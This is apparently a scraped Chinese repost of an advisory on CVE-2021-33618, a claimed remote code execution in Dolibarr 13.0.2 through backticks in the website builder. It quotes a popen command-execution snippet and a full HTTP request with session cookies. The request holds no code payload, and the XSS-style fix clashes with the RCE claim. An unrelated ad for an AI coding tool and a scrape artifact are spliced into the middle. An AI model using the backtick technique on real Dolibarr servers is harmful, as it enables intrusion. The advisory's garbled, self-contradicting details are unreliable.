受影响的产品是dolibarr erp和crm。
测试版本为Dolibarr 13.0.2。
在默认设置下,Dolibarr应用程序允许在网站构建器模块中进行远程代码执行。尽管尝试使用像“exec()”、“system()”或“shell_exec()”这样的语句时,应用程序会正确地阻止它们,但我们发现可以通过使用““”(反引号)来执行代码,这种方法类似于“shell_exec()”或“echo fread(popen(‘/bin/ls /’, ‘r’), 4096);”。
代码语言为javascript,代码运行次数为0。以下是用于执行此漏洞的HTTP请求示例:
POST /user/group/card.php HTTP/1.1Host: 10.11.9.80User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 -securitytest-for-dolibarrAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: multipart/form-data; boundary=---------------------------329097076628264922392755475836Content-Length: 950Origin: http://10.11.9.80Connection: closeReferer: http://10.11.9.80/user/group/card.php?id=1&action=edit&token=4726524fe505b027519a535e08c11fb6Cookie: PHPSESSID=8s2jl8fhmbm5th8r4baasak1q2; DOLSESSID_736206a821984837877b8a6a901910d2=4jkf7smp24evfm3vvnnunj8jaqUpgrade-Insecure-Requests: 1-----------------------------329097076628264922392755475836Content-Disposition: form-data; name="token"6585d0838337cafddc3387fcccbe9d91-----------------------------329097076628264922392755475836Content-Disposition: form-data; name="action"update-----------------------------329097076628264922392755475836Content-Disposition: form-data; name="backtopage"/user/group/card.php?id=1-----------------------------329097076628264922392755475836Content-Disposition: form-data; name="id"1-----------------------------329097076628264922392755475836Content-Disposition: form-data; name="nom"Troventtest-----------------------------329097076628264922392755475836Content-Disposition: form-data; name="note"-----------------------------329097076628264922392755475836Content-Disposition: form-data; name="save"Save-----------------------------329097076628264922392755475836--
修复方案包括:
代码小浣熊
代码小浣熊是基于商汤大语言模型的软件智能研发助手,覆盖软件需求分析、架构设计、代码编写、软件测试等环节
51 查看详情
始终对用户输入进行转义,无论其在哪里显示。将所有HTML标签和属性列入黑名单。
此漏洞在Dolibarr版本14.0.0中已被修复,并由Trovent验证。
以上就是CVE-2021-33618 Dolibarr ERP/CRM 13.0.2 远程代码执行的详细内容,更多请关注创想鸟其它相关文章!
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。
如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 chuangxiangniao@163.com 举报,一经查实,本站将立刻删除。
发布者:程序猿,转转请注明出处:https://www.chuangxiangniao.com/p/478939.html
微信扫一扫
支付宝扫一扫